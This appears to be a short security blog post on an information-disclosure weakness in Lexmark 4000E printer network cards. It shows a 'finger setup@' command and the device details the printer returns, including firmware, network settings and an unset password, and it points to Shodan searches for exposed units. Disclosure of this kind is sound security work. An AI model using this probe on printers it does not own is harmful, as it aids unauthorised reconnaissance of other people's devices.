Lexmark 4000E Remote Information Disclosure

A friend pointed out Lexmark 4000E printers (Shodan search) were responsive to commands via the old finger protocol. He also pointed out there is a blog about this and a lot more at Infobyte Security as well as a full list of commands available including some specifically for the OptraImage at India Study Channel.

df:/home/df # finger setup@

Ethernet 10/100

Network Card
Status: Connected
Speed, Duplex: 100 Mbps, Full Duplex (Auto)
Current Date and Time: 1970-01-16 11:07
End-of-Job Timeout: 90
UAA: 0020004E195C
LAA: 000000000000
Part Number: 56P2129
EC: 5C0027
Firmware Version: LC.MD.P107
Compi: 28-Nov-06 17:27, mls-bld
Password: Not Set

NPAP Active: Yes
NPA Mode: Auto
Printer Type: Lexmark T650

Active: On
Enable DHCP: Off
Enable BOOTP: Off
AutoIP: Off
Address Source: Manual
Fully Qualified Domain Name: test.example.org
WINS Status: Unregistered
WINS Server:
Zero Configuration Name: Lexmark N4000e
df:/home/df #


Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: